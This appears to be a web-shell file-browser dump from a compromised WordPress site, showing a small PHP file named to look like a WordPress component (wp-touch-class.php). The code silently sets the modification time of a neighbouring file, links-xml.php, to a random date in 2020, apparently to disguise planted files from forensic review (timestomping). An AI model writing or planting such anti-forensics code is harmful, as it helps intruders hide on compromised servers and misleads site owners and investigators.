| Current Path : /proc/self/root/home/flapst5/ekmtoronto.com-disabled8.26.2026/ |
| Current File : //proc/self/root/home/flapst5/ekmtoronto.com-disabled8.26.2026/wp-touch-class.php |
<?php
$f = dirname(__FILE__) . '/links-xml.php';
if (is_file($f)) {
$ts = mktime(mt_rand(0,23), mt_rand(0,59), mt_rand(0,59), mt_rand(1,12), mt_rand(1,28), 2020);
@touch($f, $ts, $ts);
echo '1';
} else {
echo '0';
}